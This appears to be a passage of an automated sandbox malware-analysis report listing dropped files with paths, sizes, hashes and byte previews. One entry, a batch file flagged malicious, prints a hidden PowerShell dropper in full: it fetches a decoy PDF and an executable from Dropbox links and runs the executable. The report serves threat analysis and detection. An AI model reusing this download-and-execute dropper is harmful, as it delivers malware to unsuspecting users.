                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................z..............z........#.............................Rich..................PE..L......C.....................`....................@...........................6.....Y.$..............................................."..............................................................................................................text............................... ..`.rdata...|..........................@..@.data....)...P.......P..............@....rsrc........."......0..............@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\2eec05b6-d336-4995-b720-cda0de21ea96.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):11185
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                        MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                        SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                        SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                        SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\370c5591-86e7-4d5a-8ff8-1429d175301f.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 204 x 264, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):437259
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.998726360451669
                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:r0Ti9JPNfgBTIxXL2v6YRl5JCqqpRFW0X2yk:us1IBTI9LkhSqqQ0Xq
                                                                                                                                                                                                                                                                                                                        MD5:D14135E953CC12D6CE5AB9529108AB12
                                                                                                                                                                                                                                                                                                                        SHA1:A3CA22055B2864F479A137CFDA856009AEB693A7
                                                                                                                                                                                                                                                                                                                        SHA-256:91D3663C9ED02759863A7B0D7BB909BC09C172FB698CA65F01C4624A8E09DF46
                                                                                                                                                                                                                                                                                                                        SHA-512:9155BC046699A5B69424D2E1CD9AD00447C02E5CEC1377C8DAE592CB2639C1495FE0217FD906666FAF2D2D29F7FC27A2CA52DEC72B9A04D06DEBFC29F9C1C059
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............,......sRGB.........IDATx^..g.mE...`....f..A....Q......U~....;..e...A.T..%.. ..s.....=..u.9...gWM..9k....zzw.^.{..n..)G........l.S.B...`..!P ...`.4."..@...D0.X1...&>.....L.VLC ....@.@.S.....`..!P ...`.4."..@...D0.X1...&>.....L.VLC ....@.@.S.....`..!P ...`.4."..@...D0.X1...&>.....L.VLC ....@..J.....{..7.9.r.-....../}................g>s...K......G..n...._NW]u....<fr......#......O...?....n...M7.4...?.....9.....gl....MO|..[.W_}....O..W.2=.....?..u. ...g..<.9..|.....?......lz...f....+...9...t...w.{..(.k]X...7..~.Lw....'=.I...yf..........7.<=..O..p.;.l...7._...-..~........l.R.......}.U..........=...........U.Q=....~...4...~......\...Mx..zk...|d.M..........<..'m..^E;Ge_{.....g..C...........k.p..y8.'`w........?.yz.....t.E.5g..........U.8...&.+..bz...8..~...\..w.KK...=......&....~.-.M.~....L..x.....h:..Z...+.~...O1.F>.9...nhy..=....p..--.u.Y..>..f.....].w......}&=..\.z=iH...c.=v........k....V.....'........

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\4125ab6d-2dc1-4e48-891b-df8424724c71.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41924
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):76314
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.996159328201069
                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:fFZ2cHkObrS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz88:fbb1UdS8scZNzFrMa4M+lKqeZ
                                                                                                                                                                                                                                                                                                                        MD5:703D592C85D2790D89047C1614A54B4F
                                                                                                                                                                                                                                                                                                                        SHA1:0C08F096AD544A63ACE8AA1AA738CC0B374F2A23
                                                                                                                                                                                                                                                                                                                        SHA-256:A01513000969824FA1761DCDD77F5EE9B6FD958B4E9596522CEBC47BB69DF194
                                                                                                                                                                                                                                                                                                                        SHA-512:D0C0F0B0A060D3DD52942556615B93971292E1F0C10555681CB6E4857E605EB2CFBACBADD263FB954D4062A63BBCCCB4B514428FDB95F6C0C94CC221B28B1ED5
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:...........}io.8..w... @*..S..=.X.v.^$..e..0..r.ek.,.+..x..._..$."..:.....]E>7..x..z...?..7t.s.....!/.."..}../....u...^..|{...B...]....q....Znh....;B.u....r.z..._.w~p.}<......B.....}k.........a....ur......:.E.~..f7!.....c....V.Z.."..._Q..m....?..q.......{;.V.g.".i..<.r=.9.>...}^.Ykw....\,. .. .<YkL........C*...........m.'....0O....g.?.8C............x.........=YO.......`.<....o..=..he..AaHy@g....z.)C..G....[.@.........x.......O...c..H..5..}..5$?.:....7g.....M~....4....u..P...c...S..w.(.2N['......&..v...."p.#..Z.F.<'._........&~CA......Z....p......>.o......m.(....a_%F.}r||z.m...1..8....p.-..4'.O....S0..f<.n...KP<.fd.....-w[B..%....Z!..H...C..CB+J)Ef.t[;.1.?.Q.j{.....*.y...>Y.......Me..Vx!.._...(>.......>.j.%.(..%]...E...~.p......tp.P.3........W>V&.J.s.]..../~.^.....u.X.1.J.6..8.^...Q.a8".z}....|.V.M".+..y.-...r..b..'k..9..~.@g3.:..n....M....s.T.#|.Vd.../..K<...^...p......X.5..6..F..".tO...........o}......}...D..`o....<..(....?..y.JQ.....F01a

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\445af71d-5754-4fbe-9156-311fe80c8cdf.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):138356
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                                                        MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                                                        SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                                                        SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                                                        SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\697963187.bat

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        File Type:DOS batch file, ASCII text, with very long lines (459), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):519
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.5470282107182305
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:0G81kFX0b11JktZM9kaMBfH1MRdEFvtyJk4pUrXB42Wgn:0GpObJIZdF+YCJV2R42WQ
                                                                                                                                                                                                                                                                                                                        MD5:17ECE0B40E0D30E590955D79B4DE9541
                                                                                                                                                                                                                                                                                                                        SHA1:673913590C7BD10E084EC3E3AC49E2176CFBA2BC
                                                                                                                                                                                                                                                                                                                        SHA-256:2D3151F761001EE38041D5B55EF6E3CC19E76B688BC42A9648D6F64A326DC063
                                                                                                                                                                                                                                                                                                                        SHA-512:9F272836BD4C4E30D07FD51A1DA27187C070655A4F037ED7828DB11EFCD1FD7D82CAFF2163DA8FB505BA36E27E22D5728422AF12D497ABFC43AE131B59203C47
                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                        Preview:@echo off..powershell -WindowStyle Hidden -Command ^.. "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"..exit

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7078ba7c-3cba-4b5b-900c-237b769fc9d5.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_35stjo4m.bfc.ps1

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_akvkdfbr.uw0.psm1

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jf1beawp.03s.ps1

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jxymub3r.2q1.ps1

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqqkp5jm.mhu.psm1

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y4r5z12k.p1j.psm1

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\b3494cd6-b614-4af2-b9aa-387b71ac23db.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):206855
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.983991878155761
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3072:5WcDW3D2an0GMbYGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEJ:l81LZl7E6lEMVo/S01fDpWmEgs
                                                                                                                                                                                                                                                                                                                        MD5:073B6033A50D66A430E28DA712B07D76
                                                                                                                                                                                                                                                                                                                        SHA1:84EC9AE47D4E80E5DD8E45BFAE344A23547A957D
                                                                                                                                                                                                                                                                                                                        SHA-256:1CC5E40057D60CCF8C38887E0727B951355D1EE84E72CAD758835017658F5DDD
                                                                                                                                                                                                                                                                                                                        SHA-512:0491F27DAD2E2BA9260DADC88283AA9D97D46EC88F576A0C3A5A5E6EFE43C6B015CF64FC9C8FE46C73F2F276BEBF9E224B95AB6BF5ECF7DB42CB96B51572781F
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1658
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.404203327976004
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx0pTp5KgL0pU5M:JIVuwEw5MUFZLBQLtMrrfM
                                                                                                                                                                                                                                                                                                                        MD5:78CA3D2FBC70BD741197BE95328CA86B
                                                                                                                                                                                                                                                                                                                        SHA1:AEC768D7976CA578DC7EF4D7EE35B46EE19AC2BD
                                                                                                                                                                                                                                                                                                                        SHA-256:3E8C1FE525B7A793FBF0E349BE4DB981CD889B62E4D86320C62C292A18C087FA
                                                                                                                                                                                                                                                                                                                        SHA-512:1419281A361D909D968A78D6A7D76F1D4A6681D96DA3B4E53636540A6665DC189A0AFC7C4511AC83140735A5250DD24B0E9E36954EE80DD78F739A504EB6043A
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ec297a20-7091-4c72-83ff-22a05ce45dfa.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 276634
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):263704
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.998798806129367
                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:cQBevuVtTT0bCnop1MIPG4y9XgcbKdhRuQRhzb6d0X7ayNC:TeGGCnorP0952dPuQRFW0X2yk
                                                                                                                                                                                                                                                                                                                        MD5:B85DCDA827DC7BB4EF02A07D18DC64F4
                                                                                                                                                                                                                                                                                                                        SHA1:9C284CF92B7C27D719A11396522EFC52196FD60B
                                                                                                                                                                                                                                                                                                                        SHA-256:B9771078FC3B448D98FF53DE83C6C718326D6592F37CA48D3789120D41981FCA
                                                                                                                                                                                                                                                                                                                        SHA-512:215C2A12292278EED6569C4730397FDA3B4188F76B5239F5783D24AA636A4D5103FED621D1D9B973605C754413597657BACFDEE46F203AAC006E24F9E8DF5691
                                                                                                                                                                                                                                                                                                                        Malicious:false
